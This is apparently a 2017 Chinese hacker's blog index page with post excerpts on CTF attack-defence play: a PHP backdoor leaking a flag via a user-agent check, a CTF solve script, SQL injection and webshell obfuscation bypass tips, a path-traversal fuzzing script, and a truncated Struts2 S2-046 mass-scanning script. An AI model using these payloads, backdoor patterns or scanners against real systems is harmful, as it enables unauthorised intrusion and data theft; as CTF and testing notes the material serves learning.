显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

__p@rano1d

Become @ programmer

 
 
 
 
 
 

CTF线下赛留后门的一些思路

2017-7-13 11:38:59 阅读343 评论0 132017/07 July13

主要是思路,大概就是把getflag的条件写在配置文件,在header头做手脚。把getflag的命令写在配置文件,配个demo使用。在自己的浏览器改ua就能看见flag了。

<?php
echo 'hello';
$flag = 'ss';
if (@$_SERVER['HTTP_USER_AGENT'] == 'flag'){
header("thisisflag:$flag");
}

?>


作者  | 2017-7-13 11:38:59 | 阅读(343) |评论(0) | 阅读全文>>

一道简单的CTF题,5s获取flag

2017-6-7 9:38:42 阅读75 评论0 72017/06 June7

题目关键就几点,随便发一个包过去会有response,在响应头有base64加密的hint,解密之后就可以得到真正要POST的数据(key=xxxxxxx)。key的时效是5s,写个脚本就可以了。但是题目做了限制,不能抓包,要根据响应header头构造request的header头。

脚本如下:

import requests
import json
import base64
import re
import urllib2
import urllib
from time import sleep

url = 'http://172.16.0.34/fast_upload.php'
payload = {'key': 'GMIwrnqcgm3yKZV0JSzX'}

作者  | 2017-6-7 9:38:42 | 阅读(75) |评论(0) | 阅读全文>>

bypass

2017-5-24 17:24:32 阅读30 评论0 242017/05 May24

SQL:sql.php/3.rar?id=1 union select
/*!(fuzz)SelECt*/
shell:代码混淆+奇葩函数+多层加密解密

作者  | 2017-5-24 17:24:32 | 阅读(30) |评论(0) | 阅读全文>>

fuzz参数脚本

2017-5-24 17:06:09 阅读61 评论0 242017/05 May24

以后造轮子会用到。

neag1e大牛

In [1]: base_url = "http://www.t00ls.net/index.php?id={}&abc={}&xxx={}"

In [3]: payload_list = ('../boot.ini','../etc/passwd','../windows/win.ini','../../boot.ini','../../etc/passwd')

In [4]: default_list = ('123','456','ooo')

In [5]: for payload in payload_list:

作者  | 2017-5-24 17:06:09 | 阅读(61) |评论(0) | 阅读全文>>

st2-046

2017-5-24 16:21:24 阅读88 评论0 242017/05 May24

import requests
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
import sys


def exp(url):
#print url
try:
x = requests.post(url,data=data,headers=headers)
print url
if 'testtest' in x.content:

print url+'---------------------vulnerable!!'
with open('result.txt','a+') as f:
f.writelines(url+'\n')

作者  | 2017-5-24 16:21:24 | 阅读(88) |评论(0) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 
 

吉林省 辽源市 摩羯座

 发消息  写留言

 
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 
 
 
心情随笔列表加载中...
 
 
 
 
 
 
 
列表加载中...
 
 
 
 
 
 我要留言
 
 
 
留言列表加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018

注册 登录  
 加关注